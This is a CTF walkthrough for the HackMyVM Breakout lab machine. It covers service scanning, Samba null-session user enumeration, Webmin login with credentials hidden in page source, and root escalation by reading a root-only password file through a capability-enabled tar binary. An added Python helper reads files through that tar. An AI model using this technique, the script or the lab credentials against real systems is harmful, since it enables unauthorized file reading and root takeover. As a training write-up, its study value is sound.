In this write-up, I will guide you through the steps I took to complete the HackMyVM - Breakout CTF challenge. The objective is to gain root access to the target machine by exploiting the vulnerabilities identified along the way. Check out the video.
TL;DR
Reconnaissance
Network/Port Scanning (Nmap)
Command:
nmap -sV -sC -vv -oA breakout 172.16.101.74
Explanation:
nmap: Network and port scanner used to discover which services are running.
-sV: Perform version detection of the discovered services.
-sC: Run the default NSE script set against them.
-vv: Very verbose output.
-oA breakout: Save the results in all three formats (normal, XML and grepable) using the base filename "breakout".
172.16.101.74: IP address of the Breakout VM on my network.
Output:
# Nmap 7.94SVN scan initiated Thu Aug 22 00:31:05 2024 as: nmap -sC -sV -vv -oA nmap/breakout 172.16.101.74
Warning: Hit PCRE_ERROR_MATCHLIMIT when probing for service http with the regex '^HTTP/1\.1 \d\d\d (?:[^\r\n]*\r\n(?!\r\n))*?.*\r\nServer: Virata-EmWeb/R([\d_]+)\r\nContent-Type: text/html; ?charset=UTF-8\r\nExpires: .*<title>HP (Color |)LaserJet ([\w._ -]+) '
Nmap scan report for 172.16.101.74
Host is up, received syn-ack (0.0026s latency).
Scanned at 2024-08-22 00:31:13 PDT for 42s
Not shown: 995 closed tcp ports (conn-refused)
PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack Apache httpd 2.4.51 ((Debian))
|_http-title: Apache2 Debian Default Page: It works
| http-methods:
|_ Supported Methods: POST OPTIONS HEAD GET
|_http-server-header: Apache/2.4.51 (Debian)
139/tcp open netbios-ssn syn-ack Samba smbd 4.6.2
445/tcp open netbios-ssn syn-ack Samba smbd 4.6.2
10000/tcp open http syn-ack MiniServ 1.981 (Webmin httpd)
|_http-favicon: Unknown favicon MD5: FE08A1EE35C708AD85285F21B625A0FC
|_http-title: 200 — Document follows
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
20000/tcp open http syn-ack MiniServ 1.830 (Webmin httpd)
|_http-title: 200 — Document follows
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-favicon: Unknown favicon MD5: BB90C57C0F5C0535492D436A42536B31
Host script results:
| smb2-time:
| date: 2024-08-22T07:31:25
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| nbstat: NetBIOS name: BREAKOUT, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
| BREAKOUT<00> Flags: <unique><active>
| BREAKOUT<03> Flags: <unique><active>
| BREAKOUT<20> Flags: <unique><active>
| \x01\x02__MSBROWSE__\x02<01> Flags: <group><active>
| WORKGROUP<00> Flags: <group><active>
| WORKGROUP<1d> Flags: <unique><active>
| WORKGROUP<1e> Flags: <group><active>
| Statistics:
| 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
| 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
|_ 00:00:00:00:00:00:00:00:00:00:00:00:00:00
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 56402/tcp): CLEAN (Couldn't connect)
| Check 2 (port 21538/tcp): CLEAN (Couldn't connect)
| Check 3 (port 29492/udp): CLEAN (Failed to receive data)
| Check 4 (port 55250/udp): CLEAN (Failed to receive data)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
|_clock-skew: 0s
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Aug 22 00:31:55 2024 -- 1 IP address (1 host up) scanned in 49.86 seconds
Findings: There is an Apache web server on port 80, Samba on ports 139/445, and two more HTTP servers on ports 10000 and 20000 that identify themselves as MiniServ, the web server used by Webmin.
Let's check out the web server on port 80 and, in the background, run gobuster to brute-force web directories and enum4linux to enumerate the Samba server.
Directory Brute-forcing (Gobuster)
Command:
gobuster dir -u http://172.16.101.74 -w /SecLists/Discovery/Web-Content/directory-list-2.3-big.txt
Note: I have set up an alias to run gobuster inside a Docker container; the /SecLists path in the command is the volume mounted by that alias.
Alias: alias gobuster='docker run -it --rm --name gobuster -v /home/ayush/Tools/SecLists/:/SecLists ghcr.io/oj/gobuster'
Explanation:
dir: Mode of operation indicating directory/file enumeration.
-u http://172.16.101.74: Base URL of the target web server to scan.
-w /SecLists/Discovery/Web-Content/directory-list-2.3-big.txt: Path of the word list to use (a path inside the container).
Samba Enumeration (enum4linux)
Command:
enum4linux -a 172.16.101.74
Explanation:
-a: Do all simple enumeration (-U -S -G -P -r -o -n -i).
172.16.101.74: IP of the target Samba server to enumerate.
Output:
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Thu Aug 22 02:14:41 2024
=========================================( Target Information )=========================================
Target ........... 172.16.101.74
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
===========================( Enumerating Workgroup/Domain on 172.16.101.74 )===========================
[+] Got domain/workgroup name: WORKGROUP
===================================( Session Check on 172.16.101.74 )===================================
[+] Server 172.16.101.74 allows sessions using username '', password ''
================================( Getting domain SID for 172.16.101.74 )================================
Domain Name: WORKGROUP
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup
==================( Users on 172.16.101.74 via RID cycling (RIDS: 500-550,1000-1050) )==================
[I] Found new SID:
S-1-22-1
[I] Found new SID:
S-1-5-32
[I] Found new SID:
S-1-5-32
[I] Found new SID:
S-1-5-32
[I] Found new SID:
S-1-5-32
[+] Enumerating users using SID S-1-5-32 and logon username '', password ''
S-1-5-32-544 BUILTIN\Administrators (Local Group)
S-1-5-32-545 BUILTIN\Users (Local Group)
S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-547 BUILTIN\Power Users (Local Group)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\cyber (Local User)
[+] Enumerating users using SID S-1-5-21-1683874020-4104641535-3793993001 and logon username '', password ''
S-1-5-21-1683874020-4104641535-3793993001-501 BREAKOUT\nobody (Local User)
S-1-5-21-1683874020-4104641535-3793993001-513 BREAKOUT\None (Domain Group)
enum4linux complete on Thu Aug 22 02:15:13 2024
Findings:
The server accepts a null session (username '' and password ''), and RID cycling reveals a local Unix user named cyber (S-1-22-1-1000).
Visiting Web Page (Port 80)
This is the default Apache landing page. Let's check the page source in case there is extra information there (Ctrl + U in the browser).
The source contains a block of text that is not HTML. Identifying it with an online tool suggests it is a Brainf*ck program rather than a simple encoding: running the program prints the message.
.2uqPEfj3D<P'a-3
This looks like a password; we can try it out somewhere.
Visiting Web Page (Port 20000)
On visiting http://172.16.101.74:20000 the web page asks us to redirect to https://172.16.101.74:20000 (HTTPS).
Click on the link to visit the HTTPS web page.
We get a Webmin login page.
User (cyber) Access
We can try the cyber username we found from the Samba enumeration and .2uqPEfj3D<P'a-3 password from decoding the encoded message.
The credentials work and we get a menu to the left.
At the bottom of the menu there is an icon that opens a command shell.
We can read the user flag from the user.txt file by running the command:
cat user.txt
Privilege Escalation
Listing the files and their permissions in the current directory (/home/cyber) shows a copy of the tar executable that is owned by root and has been given extra privileges.
On digging deeper (getcap lists file capabilities, which ls -l does not show), we can see that this tar binary is allowed to read any file on the file system regardless of its permissions.
After looking through the file system of the victim machine, we will find a hidden file at /var/backups/.old_pass.bak
The permissions show that the file is owned by root and only root can read and write it.
We can use the tar executable from the home directory to read its contents: archive the file with the privileged tar, then extract the archive as cyber.
We start by archiving the file. Command:
./tar -cf password.tar /var/backups/.old_pass.bak
tar prints "Removing leading `/' from member names", so inside the archive the file is stored as var/backups/.old_pass.bak. Then we extract it.
Command:
./tar xvf password.tar
Let's check the permissions on the extracted file. Command:
ls -l var/backups/.old_pass.bak
We see that the extracted copy is owned by the user cyber (the user who ran the extraction) with read and write permission for the owner, so we can read it normally.
Reading the extracted file. Command:
cat var/backups/.old_pass.bak
Ts&4&YurgtRX(=~h
Looks like a password, we can try it with the root user.
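The archive-and-extract trick above, repackaged as an added example (my code, not part of the original write-up or of the tar project): it runs the privileged tar with `-cf -` so the archive goes to stdout, then pulls the single member out of that stream in memory with Python's tarfile module, so no password.tar or extracted copy is left on disk. `capabilities()` is the check I would run first, because a privilege granted as a file capability does not show up in `ls -l` but does in `getcap`. The tar binary and target path are assumptions passed as arguments (on the box that would be `./tar` and `/var/backups/.old_pass.bak`); the file used to exercise it in the test is constructed.

```python
import io
import shutil
import subprocess
import tarfile


def capabilities(tar_bin: str) -> str:
    """Return the getcap line for tar_bin, or '' if getcap is absent or reports nothing.

    A file capability is a different mechanism from a SUID bit: ls -l shows the
    latter, only getcap shows the former, so check both before trusting a binary.
    """
    getcap = shutil.which("getcap")
    if not getcap:
        return ""
    result = subprocess.run([getcap, tar_bin], capture_output=True, text=True)
    return result.stdout.strip()


def read_via_tar(tar_bin: str, path: str) -> bytes:
    """Read `path` by asking `tar_bin` to archive it to stdout and unpacking in memory.

    Nothing is written to disk, so there is no archive or extracted copy to
    clean up, and no ownership quirks of the extracted file to worry about.
    """
    # -f - sends the archive to stdout. tar strips the leading "/" from member
    # names (it prints "Removing leading `/' from member names" on stderr), so
    # the member is stored as e.g. var/backups/.old_pass.bak.
    proc = subprocess.run([tar_bin, "-cf", "-", path], capture_output=True, check=True)
    with tarfile.open(fileobj=io.BytesIO(proc.stdout), mode="r:") as archive:
        files = [m for m in archive.getmembers() if m.isfile()]
        if len(files) != 1:
            raise RuntimeError(f"expected one regular file in the archive, got {len(files)}")
        with archive.extractfile(files[0]) as fh:
            return fh.read()


if __name__ == "__main__":
    import sys

    # Usage on the box: python3 readtar.py ./tar /var/backups/.old_pass.bak
    tar_bin, target = sys.argv[1], sys.argv[2]
    print(capabilities(tar_bin) or "(no file capabilities reported)", file=sys.stderr)
    sys.stdout.write(read_via_tar(tar_bin, target).decode(errors="replace"))
```

The second tar in the original two-step method is only there to unpack; here tarfile does that, which also means the privileged binary is invoked exactly once and the stream never touches the file system.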
Try using the username root and password Ts&4&YurgtRX(=~h on the Webmin authentication portal at https://172.16.101.74:20000/
These credentials work and we are now root.
And finally, we can read the root flag:
cat rOOt.txt
This looks like an encoded message. First identify the encoding, then decode it.
It is again a Brainf*ck program; running it the same way as before gives the following output:
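Both the password hidden in the page source and the root flag are Brainf*ck programs rather than encodings in the usual sense: the text is a program that prints the message when executed. Below is a small interpreter as an added example (my code, not from the original write-up or from any tool it uses) so the decoding can be done offline. `to_brainfuck` is a helper I added purely so that a round trip can be checked; `SAMPLE_PROGRAM` is constructed, not taken from the box. One caveat when pasting from page source: every one of `<`, `>`, `+`, `-`, `.`, `,`, `[` and `]` is an instruction, so strip the HTML comment delimiters `<!--` and `-->` first or the leading `<` walks the pointer off the start of the tape (the interpreter raises rather than silently producing garbage).

```python
def run_brainfuck(program: str, max_steps: int = 5_000_000) -> str:
    """Execute a Brainf*ck program with no input and return everything it prints.

    Non-command characters are ignored, as the language specifies. The tape
    starts at cell 0 and may not go negative, so a stray "<" (for example from
    a pasted "<!--") raises IndexError instead of corrupting the output.
    """
    code = [c for c in program if c in "+-<>.,[]"]

    # Pre-match the brackets so loop jumps are constant time and an unbalanced
    # program is rejected before anything runs.
    jump = {}
    stack = []
    for pc, c in enumerate(code):
        if c == "[":
            stack.append(pc)
        elif c == "]":
            if not stack:
                raise ValueError(f"unmatched ']' at instruction {pc}")
            start = stack.pop()
            jump[start], jump[pc] = pc, start
    if stack:
        raise ValueError(f"unmatched '[' at instruction {stack[-1]}")

    tape = [0] * 30_000  # classic tape of 8-bit cells; grows to the right if needed
    ptr = pc = steps = 0
    out = []
    while pc < len(code):
        steps += 1
        if steps > max_steps:
            raise RuntimeError("step limit hit; the program does not seem to terminate")
        c = code[pc]
        if c == ">":
            ptr += 1
            if ptr == len(tape):
                tape.append(0)
        elif c == "<":
            if ptr == 0:
                raise IndexError(f"tape pointer moved below 0 at instruction {pc}")
            ptr -= 1
        elif c == "+":
            tape[ptr] = (tape[ptr] + 1) % 256
        elif c == "-":
            tape[ptr] = (tape[ptr] - 1) % 256
        elif c == ".":
            out.append(chr(tape[ptr]))
        elif c == ",":
            tape[ptr] = 0  # no stdin in this use case: treat a read as EOF (0)
        elif c == "[" and tape[ptr] == 0:
            pc = jump[pc]
        elif c == "]" and tape[ptr] != 0:
            pc = jump[pc]
        pc += 1
    return "".join(out)


def to_brainfuck(text: str) -> str:
    """Testing helper (my addition): emit a program that prints `text` using one
    cell, adjusting it by the difference from the previous character."""
    program, current = [], 0
    for ch in text:
        delta = ord(ch) - current
        program.append(("+" if delta > 0 else "-") * abs(delta) + ".")
        current = ord(ch)
    return "".join(program)


# Constructed sample (not from the page): prints "H" by computing 8 * 9 = 72.
SAMPLE_PROGRAM = "++++++++[>+++++++++<-]>."

if __name__ == "__main__":
    import sys

    # Usage: paste the program on stdin, e.g.  python3 bf.py < program.txt
    source = sys.stdin.read() if not sys.stdin.isatty() else SAMPLE_PROGRAM
    print(run_brainfuck(source))
```

The step limit matters when feeding untrusted text to the interpreter: a pasted fragment with an unbalanced-looking but valid loop can spin forever, and you want an error rather than a hung terminal.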